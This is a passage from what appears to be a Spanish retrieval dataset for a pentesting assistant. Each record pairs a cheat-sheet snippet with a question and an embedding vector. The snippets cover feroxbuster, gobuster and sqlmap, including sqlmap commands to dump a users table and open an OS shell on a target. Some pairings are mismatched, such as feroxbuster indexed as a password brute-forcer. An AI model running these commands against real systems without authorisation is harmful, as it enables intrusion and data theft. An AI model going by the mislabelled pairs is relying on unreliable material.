0.0678, -0.15349, -0.00883, -0.00859, -0.06854, 0.00507, 0.00614, -0.03345, -0.1085, 0.02651, 0.03696, -0.07715, -0.07735, -0.06839, -0.01314, 0.02017, 0.06905, 0.01826, 0.04742, -0.02057, -0.03241, -0.01798, -0.05536, 0.02855, -0.06342, 0.0201, 0.00715, -0.05835, -0.03663, 0.0608, 0.0057, -0.00418, 0.03464, 0.07474, -0.07883, -0.02156, -0.01604, 0.05577, 0.00999, -0.10967, 0.05638, 0.0296, -0.11441, -0.02098, 0.01672, 0.00054, 0.03753, 0.05573, 0.13865, -0.04929, 0.03299, 0.08305, 0.05618, -0.03337, 0.06569, 0.02011, -0.01106, 0.03252, -0.04034, 0.03081, -0.04733, -0.01657, 0.04828, -0.01753, 0.00875, -0.03103, -0.02608, -0.04699, 0.03664, 0.09852, -0.0839, -0.08322, -0.01006, -0.03654, -0.07388, 0.0402, 0.00756, 0.0478, 0.00424, -0.02004, 0.01088, -0.08133, 0.04619, -0.04556]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "quΓ© herramienta sirve para hacer un brute force rΓ‘pido de contraseΓ±as?", "v": [0.0756, 0.04242, -0.20831, -0.18042, -0.0247, -0.10904, -0.06745, -0.0718, 0.05381, -0.0867, -0.05824, 0.02421, -0.04933, -0.02716, 0.04092, -0.00334, 0.03355, -0.07421, -0.01249, 0.00283, 0.02169, -0.13759, -0.03594, -0.09029, -0.09512, -0.07342, 0.00518, 0.10893, -0.24565, -0.00796, -0.02049, 0.07084, 0.12491, -0.02183, -0.04886, 0.02011, -0.0207, 0.10801, 0.05014, 0.16175, -0.00578, 0.0505, -0.15348, 0.07278, -0.01839, 0.03617, -0.004, 0.06017, 0.09502, 0.09014, -0.08086, -0.18637, -0.12052, -0.11028, -0.11199, -0.15652, 0.11522, -0.14236, -0.09331, -0.07657, -0.15222, 0.00558, -0.01259, -0.05038, -0.12486, -0.05406, 0.04895, -0.064, -0.06571, 0.06509, -0.06861, -0.06255, -0.00646, 0.01604, -0.08441, -0.04414, 0.02548, 0.02443, -0.01101, 0.07084, -0.0354, 0.04137, -0.10622, -0.05832, -0.08388, -0.00825, 0.09044, -0.04266, 0.05392, -0.03853, 0.03257, 0.06198, -0.01536, 0.04014, 0.01896, -0.02353, 0.00527, -0.00391, -0.03051, -0.06616, 0.05791, -0.08587, -0.07294, 0.03158, -0.00323, -0.03134, -0.07234, 0.0462, -0.05945, -0.00033, 0.09565, 0.02143, -0.05557, 0.01469, -0.01141, 0.04013, -0.00034, -0.13245, -0.00688, 0.00808, -0.03353, 0.01841, -0.03217, 0.0146, -0.01734, 0.09546, 0.03105, 0.0392, -0.00203, -0.12521, 0.03583, -0.09224, -0.0396, 0.00049, -0.0167, 0.00504, 0.05148, -0.17645, -0.07729, -0.06505, 0.00708, 0.00391, -0.00949, -0.06006, 0.04487, 0.04057, 0.04081, -0.00805, -0.03076, 0.00024, 0.06341, -0.06506, -0.00316, 0.01506, -0.06088, -0.01897, -0.02566, -0.07647, -0.13961, 0.06936, -0.02013, -0.06563, -0.00258, 0.04737, -0.05632, -0.04542, 0.01134, 0.05806, 0.05578, 0.06512, 0.04555, 0.01285, 0.08758, -0.00576, 0.01681, -0.02931, -0.00524, -0.01137, -0.01902, -0.09331, 0.02454, -0.009, -0.02618, -0.00104, 0.02417, -0.06095, 0.08295, -0.0022, -0.02114, 0.01093, 0.00426, 0.00769, -0.00026, 0.00047, 0.01591, -0.03493, -0.05217, -0.04075, 0.0089, -0.04716, 0.04374, -0.07211, 0.00765, -0.03538, 0.05163, 0.06423, -0.02794, -0.06213, -0.03774, 0.0194, 0.00586, 0.04792, 0.02121, -0.02518, -0.03551, -0.03222, -0.05506, 0.05346, -0.02086, -0.02918, 0.00333, 0.01862, -0.00398, 0.03897, 0.00017, 0.05281, 0.01501, -0.03501, 0.02923, -0.00915, 0.01599, -0.05076, -0.03064, 0.01473, 0.03112, -0.0522, -0.02925, -0.01818, -0.0569, 0.01585, -0.01797, 0.00545, 0.0251, -0.03234, -0.07929, 0.01229, 0.01696, -0.02696, -0.03288, -0.03571, -0.07305, -0.02392, 0.07576, -0.01474, -0.02551, -0.0306]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "con quΓ© puedo escanear una web y obtener todos los enlaces disponibles?", "v": [0.0217, 0.16365, -0.16047, 0.02201, 0.08667, -0.07657, -0.01239, -0.1189, -0.07684, -0.09966, -0.14727, -0.09007, -0.07971, -0.11448, 0.08156, 0.15831, 0.09288, -0.06114, 0.06328, 0.07224, 0.03142, -0.03694, -0.12697, 0.00517, -0.06493, -0.09233, 0.05979, 0.0692, -0.0708, -0.00316, -0.04608, 0.0734, -0.02565, 0.04842, -0.00537, 0.07927, 0.12826, 0.12442, 0.06619, -0.08837, -0.07694, -0.09053, -0.17157, -0.04888, -0.12401, 0.0255, -0.09898, 0.04783, 0.00751, -0.02861, -0.068, -0.00221, -0.17933, -0.03091, -0.10141, -0.05892, 0.17116, -0.01708, 0.06703, 0.00308, -0.08038, 0.08799, 0.00902, -0.02058, 0.00152, 0.0016, -0.01559, 0.03729, -0.05333, -0.00961, -0.11597, 0.02511, 0.0132, -0.00481, 0.02993, 0.05943, -0.04807, 0.05216, 0.0407, 0.09038, 0.0277, 0.01597, 0.0121, -0.00494, -0.03908, 0.03613, 0.00656, -0.07752, -0.04647, -0.13432, 0.11353, 0.09607, -0.03753, 0.00896, -0.1307, -0.08377, -0.00039, 0.01337, 0.0142, -0.04302, -0.05359, 0.00959, -0.08937, 0.09512, 0.04586, 0.03093, 0.11019, -0.03313, -0.05254, -0.00163, -0.01205, 0.00931, -0.07405, -0.08522, -0.11472, 0.05749, -0.04409, -0.01419, -0.01285, -0.06253, -0.08272, -0.03851, -0.07186, 0.06114, -0.03413, 0.00038, 0.06691, 0.04018, -0.02126, -0.02513, -0.07255, -0.00615, -0.0648, -0.12426, 0.01874, 0.00654, 0.01107, -0.05018, 0.01362, -0.03642, 0.02224, -0.01733, -0.02065, -0.0611, -0.01784, -0.05301, 0.00158, -0.06029, -0.07038, -0.14395, -0.04587, 0.04691, -0.07576, 0.03767, -0.01963, 0.01691, -0.02665, -0.01316, 0.03208, 0.05925, -0.04131, 0.03842, 0.03134, 0.02349, -0.00871, 0.04271, -0.10193, -0.00902, -0.04445, 0.02893, -0.02793, 0.12578, -0.06774, -0.10757, 0.04967, -0.03786, -0.05336, -0.0586, 0.03024, -0.04071, -0.04644, -0.00909, -0.04788, 0.07005, -0.0318, -0.07629, 0.04193, -0.02038, -0.01997, 0.02583, 0.053, 0.02856, -0.03709, 0.03811, 0.03202, -0.00262, -0.05806, -0.01048, 0.05728, -0.0601, -0.10207, -0.0525, 0.03306, -0.05305, 0.00424, 0.02291, -0.01115, -0.03714, -0.03486, 0.06668, 0.02006, -0.05965, 0.07273, -0.0847, -0.02617, -0.02107, 0.0811, -0.02412, -0.02421, -0.02242, 0.01885, 0.0429, 0.06366, 0.00818, 0.02466, 0.01901, 0.01315, 0.00283, 0.00733, 0.04496, -0.01483, -0.04841, -0.05541, -0.07776, 0.00881, 0.00963, 0.01981, -0.01461, -0.06906, 0.02183, 0.06185, 0.0694, -0.02117, -0.02239, 0.02801, -0.0791, -0.06653, 0.0092, 0.01667, -0.0936, -0.02196, 0.0158, 0.02159, -0.05233, 0.04003, 0.0149]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "cual es una alternativa libre a nmap para realizar un ataque de fuerza bruta?", "v": [0.01325, 0.0083, -0.16553, -0.01039, -0.15325, 0.13079, -0.0147, 0.0267, -0.18497, -0.03462, 0.00821, -0.11856, 0.00302, 0.14247, -0.01156, -0.10419, -0.07335, -0.08995, 0.01045, -0.01416, -0.07625, -0.07759, 0.04185, -0.07703, -0.09415, -0.01456, -0.07088, 0.21151, -0.09425, -0.07103, 0.04103, 0.02495, 0.13909, -0.06787, 0.12248, 0.04059, 0.07178, 0.03517, 0.18477, 0.04985, -0.09567, 0.02127, -0.14372, 0.02121, -0.00406, -0.00471, -0.06092, 0.06454, -0.00968, 0.04042, -0.06363, 0.05822, -0.12116, -0.06379, -0.04352, -0.0893, 0.05786, -0.14697, -0.12552, 0.04697, -0.10341, 0.08591, -0.05259, -0.16071, -0.00446, -0.00843, -0.07575, -0.07755, -0.0566, -0.01897, -0.04182, -0.08579, -0.02709, -0.01669, -0.13469, 0.03349, -0.02162, 0.0358, -0.02717, 0.01521, 0.01186, -0.03229, -0.17743, -0.00647, -0.10245, -0.08525, 0.13077, -0.10587, -0.07436, 0.02147, 0.08576, 0.00053, -0.01932, 0.07972, -0.07423, -0.04968, -0.07562, 0.00937, -0.00299, -0.00809, 0.03284, -0.03846, -0.10769, -0.04007, 0.08874, -0.04686, -0.07169, 0.06105, -0.06641, 0.03731, 0.01537, -0.01623, -0.09732, 0.008, 0.0051, -0.05587, -0.12125, -0.03504, -0.01881, -0.00691, -0.09746, 0.00661, -0.028, 0.04079, -0.0642, 0.06806, 0.08913, -0.00781, -0.04074, 0.00534, 0.04162, 0.00192, 0.05327, -0.06287, -0.04133, -0.03286, 0.07362, -0.10556, -0.01112, 0.00601, -0.0029, 0.02366, 0.01844, -0.06475, 0.05121, -0.00335, -0.00866, -0.03472, -0.06081, 0.00868, 0.01617, -0.01058, 0.00698, 0.12497, -0.04848, -0.01344, -0.02538, -0.055, -0.07508, 0.12194, -0.00595, -0.03872, -0.08528, 0.00093, -0.0135, 0.00106, -0.05621, -0.06349, -0.00259, -0.03241, -0.00136, -0.00621, 0.05765, 9e-05, 0.0661, -0.09133, -0.03017, -0.02116, 0.02663, -0.00343, 0.0216, -0.00057, -0.09268, 0.02891, -0.03025, -0.0344, 0.07027, 0.00954, 0.00693, 0.02081, -0.01324, 0.04102, -0.07124, 0.0002, -0.00277, -0.04853, -0.0603, -0.02732, -0.0157, 0.01402, -0.03366, -0.06133, -0.01813, -0.02407, 0.00857, 0.0291, -0.01732, -0.00382, -0.03145, 0.03714, 0.03181, 0.00456, 0.09345, -0.0525, -0.06962, -0.00368, 0.00406, -0.01389, 0.02094, -0.01519, 0.02024, 0.06419, 0.02818, 0.03452, -0.03145, 0.00528, 0.01846, -0.0476, 0.0064, 0.02954, -0.01516, -0.05827, 0.02644, 0.00572, 0.00588, -0.0022, 0.03558, 0.04358, -0.06993, 0.00587, 0.05192, 0.04765, -0.0267, -0.05247, -0.05768, -0.01265, -0.08533, 2e-05, -0.05692, -0.02865, -0.00794, 0.04282, 0.04544, 0.01264, 0.04537, -0.00444]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "indexar": "con quΓ© puedo escanear una web para buscar directorios ocultos?", "v": [0.15534, -0.04971, -0.17546, 0.11726, 0.0042, -0.06716, -0.02483, -0.03449, 0.02835, -0.01487, -0.09805, -0.07473, -0.04359, -0.20995, 0.00248, -0.02493, 0.14727, 0.01108, 0.0668, 0.06322, 0.01496, -0.01525, -0.06117, 0.02902, -0.09439, -0.08427, -0.05416, 0.01829, -0.11851, 0.01983, -0.07193, 0.13951, 0.01672, 0.05719, -0.0913, 0.07089, 0.04555, -0.04307, 0.05444, -0.00572, -0.00326, 0.012, -0.17237, 0.04436, -0.02416, -0.06411, -0.05119, 0.04599, 0.02152, -0.0183, -0.05538, -0.09816, -0.16962, 0.04645, 0.02744, -0.05109, 0.13274, -0.01735, 0.16203, -0.00495, -0.08145, -0.00032, 0.02769, 0.06274, -0.038, -0.02366, 0.04414, 0.03352, -0.08401, 0.0054, -0.04496, 0.08219, 0.07949, 0.06348, 0.08014, 0.03445, -0.00833, -0.01775, 0.01996, 0.0688, 0.03171, 0.01042, -0.03735, 0.05203, -0.11983, -0.08111, -0.05619, 0.00336, -0.03757, -0.15823, 0.05482, 0.07066, -0.11203, 0.03939, -0.009, -0.03829, 0.06696, -0.01291, -0.07564, 0.00201, -0.08643, -0.04161, -0.19428, 0.14446, 0.04311, 0.07579, 0.0258, 0.00835, -0.10832, 0.08478, 0.03307, -0.02267, -0.05409, -0.05155, 0.00682, 0.06245, -0.01879, 0.02354, 0.06441, -0.01524, -0.03913, -0.02482, -0.10043, 0.08088, 0.02733, -0.05604, 0.0499, 0.05409, 0.02583, 0.01456, -0.05565, -0.07562, -0.12177, -0.05819, -0.0603, 0.03725, 0.01685, -0.02641, 0.04904, -0.01622, 0.05203, -0.12036, -0.08815, -0.00788, 0.00705, -0.01378, 0.05307, -0.00086, -0.02427, -0.16947, -0.01368, 0.01731, 0.00037, -0.00099, -0.00082, 0.04462, 0.04351, -0.02721, -0.04127, -0.00765, -0.02878, 0.04422, -0.0393, -0.00672, -0.04786, -0.01329, -0.06398, -0.03356, -0.0366, -0.04905, 0.00629, 0.05028, -0.03953, -0.18705, 0.01381, 0.02293, 0.01463, -0.11728, 0.06148, -0.01065, 0.02461, 0.05176, 0.00541, 0.0496, -0.03057, -0.04918, 0.07055, -0.08281, -0.05126, 0.0162, 0.07968, -0.0327, -0.01171, -0.00457, -0.01102, -0.01899, 0.04406, 0.00319, 0.04204, -0.08333, -0.0695, 0.02278, 0.00205, -0.04796, -0.02234, -0.0661, -0.02201, -0.01592, 0.02553, 0.01166, 0.05219, -0.04985, 0.0752, -0.09959, -0.01452, 0.02071, 0.01273, 0.01636, -0.06361, -0.00306, -0.02813, -0.00234, 0.05414, 0.01692, 0.03401, 0.00987, -0.01232, -0.01847, -0.01594, -0.0048, -0.04802, -0.04638, -0.07559, -0.02657, 0.05051, -0.01545, -0.0235, 0.03594, -0.04255, 0.08796, 0.01655, 0.09916, -0.00377, 0.01697, 0.00731, -0.10705, -0.04661, 0.01812, -0.01639, -0.0259, -0.0526, 0.01327, 0.00338, -0.07834, 0.02398, -0.02861]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "indexar": "cual es un programa que me ayude a encontrar servicios no listados en el DNS?", "v": [0.04679, 0.06884, -0.05723, -0.07004, 0.05216, -0.01786, -0.0736, -0.0767, -0.24236, 0.07221, -0.06209, -0.21129, -0.08721, -0.21645, -0.11212, -0.08458, 0.13663, -0.04668, 0.12202, 0.05311, -0.11968, -0.04111, -0.14357, 0.05361, -0.0836, -0.07459, 0.02682, -0.09064, -0.10018, 0.09566, 0.02882, -0.11833, -0.06001, -0.0219, 0.02543, 0.00912, 0.05702, 0.09051, 0.02983, -0.04627, 0.01091, -0.03064, -0.01876, -0.0165, -0.07282, -0.08985, 0.00343, -0.03323, 0.07025, -0.16893, -0.06198, -0.05364, -0.13785, -0.0622, 0.02615, -0.00538, 0.06461, -0.0922, -0.04046, -0.04013, -0.12036, -0.10034, 0.01742, -0.0605, 0.00876, -0.07041, 0.08185, -0.01764, -0.12371, -0.04618, 0.01369, 0.07419, 0.05439, -0.09494, -0.01715, 0.03096, 0.04212, -0.03528, 0.05861, 0.00707, 0.06786, -0.06447, -0.06582, 0.1021, -0.12275, -0.0576, -0.04179, -0.02925, -0.05194, -0.11431, 0.13108, 0.07378, -0.08916, 0.11467, 0.06342, 0.0678, 0.14061, 0.01828, 0.02335, 0.00332, 0.0606, 0.09782, -0.07226, 0.11812, -0.04417, 0.06077, 0.0533, -0.00159, -0.02326, 0.01941, 0.03628, 0.01007, -0.04648, -0.06822, -0.07403, -0.02824, -0.04332, -0.02996, 0.03015, -0.03673, -0.07699, 0.00078, -0.05141, 0.01755, 0.08128, 0.05632, -0.02459, 0.02945, -0.0423, 0.01858, 0.03532, -0.00201, -0.08589, -0.12197, -0.0492, -0.00622, -0.01135, -0.02621, 0.09691, -0.00729, 0.01902, 0.01579, 0.02362, -0.00769, 0.04783, -0.054, 0.06042, -0.04089, -0.0263, 0.04401, -0.05622, 0.06905, 0.02978, 0.0624, -0.09073, -0.0435, 0.03386, -0.04701, -0.03117, 0.06518, -0.01366, 0.00087, 0.01061, -0.03466, 0.035, 0.05847, -0.00453, 0.03054, 0.07087, 0.02718, -0.03515, 0.04555, -0.01222, -0.07488, -0.02542, 0.00514, 0.00312, -0.07783, 0.04892, 0.02462, -0.04867, 0.00162, 0.05845, 0.03203, -0.05104, -0.01615, -0.04131, 0.0084, -0.04504, 0.00271, -0.00444, 0.02842, -0.09367, -0.01218, -0.00428, -0.00546, -0.01185, -0.05285, -0.0163, -0.08788, -0.05488, -0.06509, -0.00545, -0.02143, -0.03694, 0.03021, -0.00279, 0.00787, 0.00204, 0.04976, -0.00511, -0.03863, 0.07076, -0.01904, -0.0466, -0.04819, -0.01712, -0.00947, 0.02804, 0.02356, -0.04273, 0.00602, 0.04059, 0.00422, -0.0, -0.10638, 0.0893, 0.01824, 0.03316, 0.05317, -0.00441, -0.03871, 0.02289, -0.08396, 0.02202, -0.01326, 0.0269, -0.03335, -0.00789, -0.02379, 0.01424, 0.05869, -0.02779, -0.01562, 0.02874, -0.00561, -0.0345, 0.01076, 0.00927, -0.02215, -0.01336, 0.0099, 0.05659, -0.06608, 0.08111, -0.01398]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "indexar": "que herramienta sirve para probar virtual hosts y dominios de forma rΓ‘pida?", "v": [0.11256, 0.02513, -0.2382, -0.12559, 0.02057, -0.03821, 0.05669, -0.10123, 0.06694, -0.13575, 0.02317, -0.16684, 0.06266, -0.13409, 0.00289, 0.03519, 0.2057, -0.13609, -0.04965, 0.05973, 0.02094, -0.04943, -0.1318, -0.02521, -0.00631, -0.07185, 0.02976, -0.06174, -0.14185, 0.11017, 0.03994, -0.06276, 0.00381, -0.03403, -0.08579, -0.16001, -0.02102, 0.05375, 0.03713, 0.10202, 0.07455, 0.02826, -0.06594, 0.01851, -0.07564, 0.02139, -0.10832, -0.06886, -0.01419, -0.04764, -0.05467, -0.14231, -0.14155, 0.00521, 0.01142, -0.11128, 0.17827, -0.19643, 0.02136, -0.08072, -0.11363, -0.08228, -0.00073, -0.02152, 0.04369, -0.05553, -0.0363, -0.01621, -0.16414, 0.01813, -0.05021, 0.01781, 0.05927, -0.00486, -0.01233, -0.03741, 0.00308, 0.02901, 0.08055, -0.03622, 0.08043, -0.00482, -0.09782, 0.00639, -0.0695, -0.13857, -0.06711, -0.07029, 0.05707, -0.04638, 0.06906, 0.10702, 0.0192, -0.01522, 0.02559, -0.07885, 0.13222, -0.0106, 0.00965, -0.03403, 0.10819, 0.09616, -0.15298, 0.11849, -0.00519, 0.05506, -0.03819, -0.04752, -0.0429, -0.01877, 0.057, -0.01089, -0.06537, 0.01702, 0.02823, 0.04218, -0.04168, -0.00738, 0.001, -0.03421, 0.01329, -0.02907, -0.01894, -0.00908, -0.01336, 0.00776, -0.02515, -0.02661, 0.01281, -0.06277, -0.00283, -0.04196, -0.04601, 0.01587, -0.00896, 0.01666, 0.04936, -0.04347, 0.00019, -0.08165, 0.00405, 0.05508, -0.05936, -0.11655, 0.00696, -0.03591, 0.04599, -0.06265, -0.03052, 0.03626, -0.00713, -0.03176, -0.02865, 0.03769, -0.08748, -0.01491, -0.0773, -0.02285, -0.11458, 0.06734, -0.03322, -0.02142, 0.03293, 0.03412, -0.01259, -0.04819, 0.04114, 0.0078, 0.05691, 0.08716, -0.01614, 0.04158, -0.03887, -0.01111, 0.01157, 0.05566, -0.08056, 0.00975, -0.00402, -0.07844, -0.01481, -0.03762, -0.0425, 0.02772, -0.02687, 0.01887, 0.05472, 0.01979, -0.01569, 0.02253, 0.04167, 0.02233, -0.04445, -0.0012, 0.0132, -0.03548, -0.01884, -0.03272, 0.01414, -0.04294, -0.03921, -0.06957, -0.04195, -0.04063, -0.03106, 0.04261, 0.0006, 0.00275, 0.01104, -0.02716, -0.00997, -0.01718, 0.03883, -0.0424, 5e-05, 0.01071, 0.01424, -0.01846, -0.02284, -0.06305, -0.01211, -0.00801, -0.0151, -0.00253, 0.0321, 0.08051, 0.05728, 0.03051, 0.00472, -0.04943, 0.01518, -0.00387, 0.0066, -0.01881, 0.02793, -0.05627, 0.06811, -0.00785, -0.08689, -0.00762, -0.03507, 0.03286, 0.02027, -0.01541, -0.03212, -0.06318, -0.04329, -0.01818, -0.04632, -0.05521, -0.05247, -0.01139, 0.05785, -0.02226, -0.02268, 0.01487]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "que programa puedo usar para automatizar la inyecciΓ³n SQL", "v": [-0.02566, -0.05051, -0.18398, -0.15845, 0.03209, -0.19442, -0.09685, -0.17458, -0.11345, 0.08518, -0.12724, -0.11223, 0.06336, -0.01796, -0.10786, 0.02825, 0.02304, -0.14607, -0.08443, 0.11023, 0.1401, -0.057, 0.00529, -0.10678, -0.08611, 0.13678, 0.04473, 0.04933, -0.08544, -0.09789, -0.13699, 0.00433, 0.06031, -0.0208, 0.05847, -0.06271, 0.03393, 0.08748, 0.03729, -0.00868, 0.00982, 0.03039, -0.16058, 0.00395, 0.16357, 0.09021, 0.16015, -0.00676, -0.0187, -0.05737, -0.01818, -0.03293, -0.05611, -0.09995, 0.02014, -0.08206, 0.0227, -0.06666, -0.02601, 0.05764, 0.0022, -0.00548, 0.02955, 0.0562, -0.06283, 0.0337, 0.11249, -0.05884, -0.00857, 0.12839, -0.03257, -0.00968, -0.01727, -0.04145, 0.05896, 0.05364, 0.00759, 0.00498, 0.04107, -0.04965, -0.15696, -0.03365, 0.00611, 0.10594, 0.02385, 5e-05, 0.14003, -0.0245, 0.03472, -0.03639, -0.00531, -0.03604, 0.063, 0.04131, 0.08971, -0.03374, 0.07252, -0.06658, -0.03515, 0.06427, 0.0616, -0.07464, -0.02816, 0.18814, 0.0467, 0.05714, 0.11179, -0.05016, -0.00167, -0.03646, 0.0319, -0.01333, -0.07389, -0.08996, -0.03859, 0.07836, 0.04737, 0.06273, -0.04589, -0.04836, -0.05684, 0.02616, -0.00206, 0.00182, 0.06233, -0.06349, -0.01971, 0.07857, -0.11475, 0.01606, 0.0011, 0.05911, -0.0509, -0.05662, -0.09248, 0.01932, -0.0032, -0.09266, -0.07066, -0.03614, -0.02739, 0.06811, 0.01097, -0.01238, 0.02857, -0.01862, -0.01753, -0.05031, 0.02059, 0.00365, 0.0731, -0.02672, 0.06446, 0.014, -0.04192, -0.01608, 0.09787, -0.00523, -0.05723, 0.04536, -0.01351, 0.00259, -0.04781, 0.02177, 0.04694, -0.03864, 0.01309, -0.04744, 0.019, 0.07363, 0.06331, 0.10519, 0.07259, -0.04031, 0.00994, 0.05631, -0.03012, -0.03846, 0.05976, -0.04177, -0.01961, -0.00528, 0.00202, -0.03511, 0.03656, -0.00012, -0.03716, 0.04509, 0.02213, -0.00677, -0.04489, 0.01423, 0.01518, -0.05992, 0.04089, 0.01822, 0.00016, 0.00632, 0.05305, -0.08658, -0.05119, 0.00156, -0.0413, -0.05493, 0.03645, 0.0702, -0.02058, 0.02239, 0.02702, 0.0344, -0.00855, -0.03367, 0.02337, 0.03554, -0.01413, -0.07416, -0.03797, 0.01756, 0.05608, -0.01809, -0.00892, -0.0031, 0.03793, 0.00186, -0.00824, -0.09257, 0.00982, -0.00518, 0.01047, 0.02916, -0.04357, 0.00151, -0.01216, 0.00217, 0.04379, -0.00446, -0.01603, -0.00756, -0.02873, -0.09128, 0.01671, 0.09939, -0.01782, 0.01352, -0.03656, 0.00132, -0.08998, -0.01155, -0.02479, -0.02268, 0.01377, 0.04294, 0.03129, -0.02355, -0.01197, 0.07217]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "con quΓ© herramienta escaneo automΓ‘ticamente las bases de datos", "v": [-0.12786, 0.03896, -0.10424, -0.13675, 0.06731, -0.09857, -0.07618, -0.11898, -0.18463, 0.01165, -0.17149, -0.10134, -0.11153, -0.09765, 0.0303, 0.08705, 0.06323, -0.13186, -0.02559, 0.02876, -0.02234, -0.05406, -0.07794, 0.00676, -0.12923, 0.00082, -0.01031, 0.07616, -0.21785, 0.17962, -0.00046, 0.07562, 0.00517, -0.02153, -0.08213, -0.01642, 0.02398, 0.03377, -0.02563, -0.01852, -0.06565, 0.02546, -0.10824, 0.00038, 0.08537, -0.00109, -0.08062, 0.05096, 0.02895, -0.03708, -0.04576, -0.07926, -0.0896, -0.05423, -0.02505, -0.16022, 0.21026, -0.06846, 0.06866, -0.025, -0.19271, 0.08286, 0.00256, -0.00849, -0.06008, 0.00591, 0.09551, -0.04392, -0.00188, 0.12935, 0.00543, 0.05736, 0.05802, -0.02185, -0.01047, -0.05906, 0.07223, 0.04524, 0.02852, 0.01653, -0.04701, -0.02451, -0.11663, 0.0463, -0.08407, -0.00164, 0.07838, -0.02018, -0.02786, -0.04525, 0.02035, 0.00764, -0.00851, 0.08086, 0.0835, 0.02055, 0.05896, -0.10051, 0.00921, 0.03601, 0.08044, -0.08795, -0.06725, 0.08439, 0.04992, 0.0257, 0.00291, 0.01949, -0.14347, 0.00629, -0.03754, 0.00725, -0.01329, -0.02869, 0.04152, -0.00141, 0.0499, -0.03717, -0.00486, 0.00074, 0.07628, -0.00974, 0.00804, -0.01308, -0.01876, -0.06167, -0.09117, 0.0927, 0.05513, -0.01999, -0.00602, -0.07096, -0.13243, 0.02763, 0.04333, -0.0053, -0.02152, -0.08776, -0.00795, -0.10341, -0.03798, 0.07848, -0.0659, -0.06026, 0.02783, -0.03711, 0.03384, 0.00454, -0.04292, -0.00064, -0.0063, -0.02768, 0.03332, 0.06589, -0.12485, 0.00545, -0.02051, 0.00742, -0.03528, 0.02275, -0.00041, -0.04316, -0.01971, 0.06357, 0.00358, -0.09797, 0.0429, -0.0038, -0.01858, 0.05447, -0.00546, 0.08683, 0.05284, -0.07048, 0.00085, -0.04481, -0.08081, -0.05665, -0.03547, -0.06134, -0.00408, -0.00443, 0.01531, -0.02787, 0.03724, -0.07777, -0.00081, -0.08568, 0.04743, 0.03804, -0.00194, 0.10259, 0.033, -0.08343, 0.0057, -0.04574, -0.04307, -0.00858, 0.08905, 0.00466, -0.07632, 0.06371, 0.00446, -0.01092, 0.02139, 0.07388, -0.00686, -0.07256, 0.02281, -0.01588, -0.01715, -0.00191, 0.03858, -0.00763, 0.00831, -0.01464, 0.01634, 0.00144, -0.00708, -0.00398, -0.02878, 0.00756, 0.0964, -0.03625, -0.09885, 0.04765, 0.05732, 0.0209, 0.06387, -0.01724, 0.02345, -0.03976, 0.00602, -0.01662, 0.04243, -0.04717, 0.01928, -0.04712, -0.02006, -0.0295, -0.00286, 0.04854, -0.02534, -0.05991, -0.02439, -0.03906, -0.00319, 0.02602, -0.0061, -0.07158, -0.03108, -0.02098, 0.00952, -0.06197, -0.00417, -0.04068]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL 